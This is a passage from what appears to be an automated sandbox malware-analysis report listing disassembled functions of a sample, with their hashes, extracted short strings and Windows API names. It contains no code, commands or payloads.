                                                  • Opcode ID: e2f0a36c9792dfc25722d0cd82dbc19f5185bbc43bf4844e5acf6f3e9f45b72d
                                                  • Instruction ID: 18b8f1cdc5a6089892d32dc2357b5919199d2f6632b62c0fc3b9122f5c89358e
                                                  • Opcode Fuzzy Hash: e2f0a36c9792dfc25722d0cd82dbc19f5185bbc43bf4844e5acf6f3e9f45b72d
                                                  • Instruction Fuzzy Hash: D3228530A19A19CFEB99DB18C895A6977E2FF55314F5091BAE00EC7292DF24EC45CB80
                                                  Function 00007FFAACAA3512 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: a46bd55a1bab123ab72983298774c25950e6ef9b67759de60cb20e6569959328
                                                  • Instruction ID: 4189fcb850de0db01414adf7d3884f956d6b5b3adcbcc0cbbadefb59a88e11a4
                                                  • Opcode Fuzzy Hash: a46bd55a1bab123ab72983298774c25950e6ef9b67759de60cb20e6569959328
                                                  • Instruction Fuzzy Hash: FAB1E470A1AA469FE749DB2CD0946B4B7A2FF5A700F54C179C04EC7A86EB28F855C7C0
                                                  Function 00007FFAAC6E442A Relevance: 2.8, Strings: 2, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 1c82ef15e0bcf301c121eff0329d892a57f788755c0160de8c5faf047e7bf49e
                                                  • Instruction ID: 7d91b06d34411f5e464a4747a1ad8aefbe98b98f30dc41099491e0538adf8bbd
                                                  • Opcode Fuzzy Hash: 1c82ef15e0bcf301c121eff0329d892a57f788755c0160de8c5faf047e7bf49e
                                                  • Instruction Fuzzy Hash: BFB1A47060DA468FE74ADB68C4906B4B7A1FF56300F54A1BAD04EC7A86DF28F855C7C0
                                                  Function 00007FFAAC6E48B2 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 0412b7a6ee833a86b8f26a4bb2ac9cf09845e8220f13a295179155f2711ae1b4
                                                  • Instruction ID: 5eaae9a31be516c9bebd80e1833aac4b07de1f57be7006010fb781c45b45d474
                                                  • Opcode Fuzzy Hash: 0412b7a6ee833a86b8f26a4bb2ac9cf09845e8220f13a295179155f2711ae1b4
                                                  • Instruction Fuzzy Hash: 6A514D70D0964ACFEB4ADBA8D4555BDB7B1EF45300F1091BAE01EE7296CF34A809CB94
                                                  Function 00007FFAAC6ED288 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: c3971cb5eededa71837efa703ad33c56318333ec2610ac3acee9948de8bebe96
                                                  • Instruction ID: a41ae99481b02a9ff480f07db9556b7a1c9d50304fdfee08cf6f193c796a9367
                                                  • Opcode Fuzzy Hash: c3971cb5eededa71837efa703ad33c56318333ec2610ac3acee9948de8bebe96
                                                  • Instruction Fuzzy Hash: 65518E71D0960ACFEB4ADBA8C4515FDBBB1EF55300F1091BAD01EEB282DB34A905CB90
                                                  Function 00007FFAACAAB4D8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 608086f167f9e4c857598a7494268d4a905bd828528f28ba0074f3b1a37e4080
                                                  • Instruction ID: 25228d06994f1ded5654da5cf340cf5559c79f120bca906ebecac7ebd9a8a3a4
                                                  • Opcode Fuzzy Hash: 608086f167f9e4c857598a7494268d4a905bd828528f28ba0074f3b1a37e4080
                                                  • Instruction Fuzzy Hash: FF518D71D1964ACFEB49CB98E4545FDB7B2EF49700F5080BAC00EE7292EA34A905CB90
                                                  Function 00007FFAACAA39E8 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 49c34f71396111aa91b04b338a1c5062b7f874281a9ae0344257ea91ec3203d9
                                                  • Instruction ID: 48bc02f95a5d7ecc2c0d17363dd29fdc93f08bac7e47e918d2059ccc33b4f7fc
                                                  • Opcode Fuzzy Hash: 49c34f71396111aa91b04b338a1c5062b7f874281a9ae0344257ea91ec3203d9
                                                  • Instruction Fuzzy Hash: EB517F70D1A64ECFEB49CB9CD4555BDBBB2EF49700F1081BAC01EE7281DA34A905CB91
                                                  Function 00007FFAAC6E32ED Relevance: 2.6, Strings: 2, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: c8eac7700486248c6c0c0302510d0451c6b8745bd46704f3b0fff77d9c00ffd7
                                                  • Instruction ID: 05640273c206cef02e62e543f9d522ccbd7d985d2a03feba091aafd75a26fb1b
                                                  • Opcode Fuzzy Hash: c8eac7700486248c6c0c0302510d0451c6b8745bd46704f3b0fff77d9c00ffd7
                                                  • Instruction Fuzzy Hash: FB315071B0994A8FE748DB5CD4519B8B7A1EF96710B54917AD01ED3682CF20BC16CBC0
                                                  Function 00007FFAACAA2505 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: b84f1c3316b23a147ad50feb5878bc8e6b0f07b3bf077bae47736fe658194958
                                                  • Instruction ID: e76e494ceaa76960838aa8662c82e1c30319b33d0d9bb84f5730f2f7bd3d3adf
                                                  • Opcode Fuzzy Hash: b84f1c3316b23a147ad50feb5878bc8e6b0f07b3bf077bae47736fe658194958
                                                  • Instruction Fuzzy Hash: 0B310A7291DA4A8FFB49D76898226B8B7E2FF56710F548279D04FC71C2ED5CA81983C0
                                                  Function 00007FFAACAA244B Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 32cb6f75df520e665afae015ef4aa3c9010362aac293769953c4f7da20654111
                                                  • Instruction ID: af5dec1003ca72c402f67d797dafda863fe782d7e4ceb6cfbd242030fee131b7
                                                  • Opcode Fuzzy Hash: 32cb6f75df520e665afae015ef4aa3c9010362aac293769953c4f7da20654111
                                                  • Instruction Fuzzy Hash: 9E314D71A1990A8FEB48DB58D4A19B8B3A2FF99710B50C179D01FD7682DF24BC16CBC0
                                                  Function 00007FFAACAA9F1D Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: c9518fa283037cbde389192742da82ef89a840ba94ab549945f2f97adf7b10f3
                                                  • Instruction ID: 644085d2019d39c8e2926c0e5348d0fcefecb4ee2b7d800f4dfb86b49f35ec39
                                                  • Opcode Fuzzy Hash: c9518fa283037cbde389192742da82ef89a840ba94ab549945f2f97adf7b10f3
                                                  • Instruction Fuzzy Hash: 4D316031A19A4A8FEB48DB5CD491ABCB7A2EF49710B50C179D01EC7682DB24FC16CBC0
                                                  Function 00007FFAAC51B98A Relevance: 1.8, APIs: 1, Instructions: 295COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: CreateFileTransacted
                                                  • String ID:
                                                  • API String ID: 2149338676-0
                                                  • Opcode ID: 3fd45ac2454453458c3b9e95c6be6a6bdae3599b2195d534e12a4d7de6dae23e
                                                  • Instruction ID: 21deffabaac02f69237042d3cddb383b29a03bb4c11c2c59f614462dfdea9fe5
                                                  • Opcode Fuzzy Hash: 3fd45ac2454453458c3b9e95c6be6a6bdae3599b2195d534e12a4d7de6dae23e
                                                  • Instruction Fuzzy Hash: A9913670908A5D8FDB98DF58C894BE9BBF1FB6A310F1041AED04DE3251DB75A984CB44
                                                  Function 00007FFAAC519FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ece76fddfa394a734da638b2bfdd8c6ced23041b4cda6e52f81c81416c5101ac
                                                  • Instruction ID: 3f5c47ad4df46440a587d762f43834e3164af3b50929c744b06c16b1a8aad158
                                                  • Opcode Fuzzy Hash: ece76fddfa394a734da638b2bfdd8c6ced23041b4cda6e52f81c81416c5101ac
                                                  • Instruction Fuzzy Hash: AD81D270908A1D8FDB98EF58C894BA9BBF1FB69301F1051AED04EE3651DB71A984CF44
                                                  Function 00007FFAAC51BC35 Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 6ca784dfe0e7536277cdd6064ba3f6dd3b3a78f4d1176878d8a0a0ec9d82aa67
                                                  • Instruction ID: c463c7d789c0dd55df8ed1d58b5b76cad5cc33dbaaa3527c373dec6132618d73
                                                  • Opcode Fuzzy Hash: 6ca784dfe0e7536277cdd6064ba3f6dd3b3a78f4d1176878d8a0a0ec9d82aa67
                                                  • Instruction Fuzzy Hash: F0613670908A5D8FDB98DF58C895BE9BBF1FB6A311F1041AED04EE3251DB74A984CB40
                                                  Function 00007FFAAC57F1D7 Relevance: 1.7, APIs: 1, Instructions: 152threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 3c459095b158addcf155db8164d6483075886779a18edc1e6abb368ec04797f1
                                                  • Instruction ID: d06136026a359e6333a14fe7215bb7b6b716a75625d8dc9c5ed5deb9170fa5fc
                                                  • Opcode Fuzzy Hash: 3c459095b158addcf155db8164d6483075886779a18edc1e6abb368ec04797f1
                                                  • Instruction Fuzzy Hash: 62412A74D0861C8FEB98EFA8D845AEDBBF1FB5A310F10416AD40DE7251DA71A886CB40
                                                  Function 00007FFAAC51D5D1 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  • Opcode ID: ddaa06ab08ad1eb6d76f8b8506b205ab64735feb1929c4978239e79334594782
                                                  • Instruction ID: c14bdae8994daeec52c1bb2db9bea237e73cdc01d18fecb4cc5c9141752c00b2
                                                  • Opcode Fuzzy Hash: ddaa06ab08ad1eb6d76f8b8506b205ab64735feb1929c4978239e79334594782
                                                  • Instruction Fuzzy Hash: 2841A37090C68C8FDB59DF68D859BE9BBF0EF56310F0481ABD04EDB262CA345849CB40
                                                  Function 00007FFAAC6EAFD5 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: 724c81cc9289db6f6562a37ccd0172f153d83782fbf4e4eb0868eb693a2d042c
                                                  • Instruction ID: 4e461faf7bdaf1b1691d8efb1ee56667037bbfbbdf8300efd8ce724400e7a39e
                                                  • Opcode Fuzzy Hash: 724c81cc9289db6f6562a37ccd0172f153d83782fbf4e4eb0868eb693a2d042c
                                                  • Instruction Fuzzy Hash: F391E43091D64ACFF756DB64C851AFD7BA0EF86310F10A1BBE01ED7192DB28A849C784
                                                  Function 00007FFAACAA923B Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: c5925637192cf266e863bcd2f228c384a8140e57d98bc5355fc3c1004fa6c2eb
                                                  • Instruction ID: e955d6e6a4e6ca6b1eb2496f2f9a964ef5125a4a454ea3cca6ef3c17ceed6c89
                                                  • Opcode Fuzzy Hash: c5925637192cf266e863bcd2f228c384a8140e57d98bc5355fc3c1004fa6c2eb
                                                  • Instruction Fuzzy Hash: 0C71E43092E64ACFFB55DB74D8446BD7BA2EF46700F14C4BAD00EC7181EE29A849C781
                                                  Function 00007FFAAC6E260B Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: 17a29f44d33cc01cdbf64763f59d58e7281fe012d991b49ec81511f1107a9d0c
                                                  • Instruction ID: e473457d72aef27e58f6aec2f855e2b3a0cfc1063bf5f5dd22ffb9915fa16578
                                                  • Opcode Fuzzy Hash: 17a29f44d33cc01cdbf64763f59d58e7281fe012d991b49ec81511f1107a9d0c
                                                  • Instruction Fuzzy Hash: 1D61063091E64ACFFB56DB74C8546B97BA2FF46300F1055BAE00ED7192DF28A849C780
                                                  Function 00007FFAAC6EAA20 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  • Opcode ID: 16595eaf913c7e30c82f692dafcca07b823f7f4255c2e11453315fe110cb8b2a
                                                  • Instruction ID: 800fd31e0293763bb9f9a6a4c3e9cf61c9b56ddb4247b024d16c445188d1fb35
                                                  • Opcode Fuzzy Hash: 16595eaf913c7e30c82f692dafcca07b823f7f4255c2e11453315fe110cb8b2a
                                                  • Instruction Fuzzy Hash: CD718570D1D55ACEEBA5DB18C4516B97BB1EF55300F1061BBE00EE3292DF389989CB81
                                                  Function 00007FFAAC51DA35 Relevance: 1.4, APIs: 1, Instructions: 193memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1307584285.00007FFAAC510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC510000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac510000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 135368a95ce8f93847a9b741877a90f0082a769d9797c2037d97e2b0c7611dca
                                                  • Instruction ID: 6b427edea6753fcd9be39fc4663e4da927ac4b95a220ab6e956f6d3782c6e013
                                                  • Opcode Fuzzy Hash: 135368a95ce8f93847a9b741877a90f0082a769d9797c2037d97e2b0c7611dca
                                                  • Instruction Fuzzy Hash: 21512B70908A5C8FDB58EF58C855BE9BBF1FB6A310F1041AAD04EE3252DB71A985CF41
                                                  Function 00007FFAACAA8CB1 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  • Opcode ID: 7bd288a66de672cd414c9c3f3c446cddd1602983bb46e41406f536a896f8c240
                                                  • Instruction ID: 2359495ce35374838a2591cb8cc977997f4b63e106b131f51b16a3e564bc7270
                                                  • Opcode Fuzzy Hash: 7bd288a66de672cd414c9c3f3c446cddd1602983bb46e41406f536a896f8c240
                                                  • Instruction Fuzzy Hash: 23617370D2A55ACEFBA8DB18D4517BD77E1FB65700F1080BAD00ED3691EE39A984CB81
                                                  Function 00007FFAACAA176B Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: 7c60a1fcfff293d9bf84c78c8e9a9ddbb370bc3f2da614b9275fd4460b504b42
                                                  • Instruction ID: 8aa3a2d066e868b2120a0df2952eca3afcfd20b4a134f2fdbc630a453905830b
                                                  • Opcode Fuzzy Hash: 7c60a1fcfff293d9bf84c78c8e9a9ddbb370bc3f2da614b9275fd4460b504b42
                                                  • Instruction Fuzzy Hash: 9A51CF71D2964ADFEB89DB68D4445FD7BB2FF4A700F1045BAD10ED7191EE28A805CB80
                                                  Function 00007FFAAC6E443F Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 997577f5a932a805993a73d043e08adf4aaec993fb38201dd4e900687c455809
                                                  • Instruction ID: 0c0768fc458d058044a552ace676c946615619c25dcdb80a41329eaeaba83dd4
                                                  • Opcode Fuzzy Hash: 997577f5a932a805993a73d043e08adf4aaec993fb38201dd4e900687c455809
                                                  • Instruction Fuzzy Hash: 7951BE70A099069FF749DB69C0916B5B791FF59300F50E27AE00EC7A86DF28F8558BC0
                                                  Function 00007FFAAC6ED890 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  • Opcode ID: a4da2aa7a88f3a30c0cf81ac0615d5318296539ad06f29308877ffe4950fc58f
                                                  • Instruction ID: e01fea5b828208139aac866d0343351c1680173a27e8773caa5698cc3304b57b
                                                  • Opcode Fuzzy Hash: a4da2aa7a88f3a30c0cf81ac0615d5318296539ad06f29308877ffe4950fc58f
                                                  • Instruction Fuzzy Hash: C541063091D55ACEFB69D71888506F877A1FF95310F10A5BBE04ECB586DE38A98987C0
                                                  Function 00007FFAAC6E4EB0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  • Opcode ID: ed8c4d27651381095ecc20f1176a0c2bc2ee95a9679610022b4bf79226f3c0f2
                                                  • Instruction ID: fa39868d0aeb5d541e23b5eb23e4a4949ab3040a9c90d940ad3952a7240a20fd
                                                  • Opcode Fuzzy Hash: ed8c4d27651381095ecc20f1176a0c2bc2ee95a9679610022b4bf79226f3c0f2
                                                  • Instruction Fuzzy Hash: 0041F73091D59ACEF76ADB6884516B877A1FFD5300F14D1BBE04EC7586CE38A98987C0
                                                  Function 00007FFAACAA9FF3 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaacaa0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 811eec2327c73942bc63457b888a11f93ccf49a3955b1be6eace050b37f6c5da
                                                  • Instruction ID: a7e2f52c04bd3daedde2e4c67b1b3bad136eb9a49b160dcab98c422cd673f2c8
                                                  • Opcode Fuzzy Hash: 811eec2327c73942bc63457b888a11f93ccf49a3955b1be6eace050b37f6c5da
                                                  • Instruction Fuzzy Hash: 90213831A2DAC98FF7489768A8116B87BD2EF47710F44817ED05ED65C2E918AC0D8BC0
                                                  Function 00007FFAAC6E2282 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 594706f3f5d30a49a73199fe312c78e2008932917fe0325e37cb3d18a819ffe2
                                                  • Instruction ID: beb34ae49efa1a3a1d8566a9c6ec0f3e5873247f4fcd38d13cf2535f2f79d3a8
                                                  • Opcode Fuzzy Hash: 594706f3f5d30a49a73199fe312c78e2008932917fe0325e37cb3d18a819ffe2
                                                  • Instruction Fuzzy Hash: D921FB71E0891D9FDF99DB58C455AEDB7B2FF59300F0051AAE04EE3291CB35A9458B40
                                                  Function 00007FFAAC6EAC72 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1309500054.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_A5EbyKyjhV.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: c6a6f261810dabaee4a1a1af900cafc4364dbbee177f75f3a001c8fb307aab3c
                                                  • Instruction ID: 995118ac723ad98d268cd759e5f501eef7b81b16e924065250c7b79ac43c304d
                                                  • Opcode Fuzzy Hash: c6a6f261810dabaee4a1a1af900cafc4364dbbee177f75f3a001c8fb307aab3c
                                                  • Instruction Fuzzy Hash: F421FA70A0891D9FDF99DB58D455AE8B7B1FB59310F1051AAE00EE3291CB35A9458B80
                                                  Function 00007FFAACAA8EB2 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1314926179.00007FFAACAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
